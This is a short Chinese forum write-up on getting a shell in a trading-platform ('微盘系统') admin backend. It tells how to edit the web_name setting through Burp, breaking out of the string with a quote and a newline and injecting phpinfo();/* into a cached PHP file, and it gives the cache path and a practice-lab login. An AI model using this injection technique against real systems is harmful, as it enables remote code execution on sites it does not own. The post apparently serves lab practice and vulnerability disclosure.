评分

【微盘系统】后台修改配置文件通过缓存进行Getshell

15天前发布

先阅读文章：https://www.hackdoor.org/d/635 或许才能看得懂下面内容。

修改网站标题：

通过Burp进行中间修改


phpinfo();/*

有换行，这个换行比较重要。没有他就GG。

然后去访问刷新前台。

看到标题改变后访问：

Getshell成功！

参数设置->配置管理->web_name->修改

Payload:

web_name"
phpinfo();/*

最终访问：

/runtime/cache/29/1918da8988fc177007497b63de9cc8.php

训练靶场：http://9003.zcbug.com
admin
123456
123456

评分

欢迎为Ta评分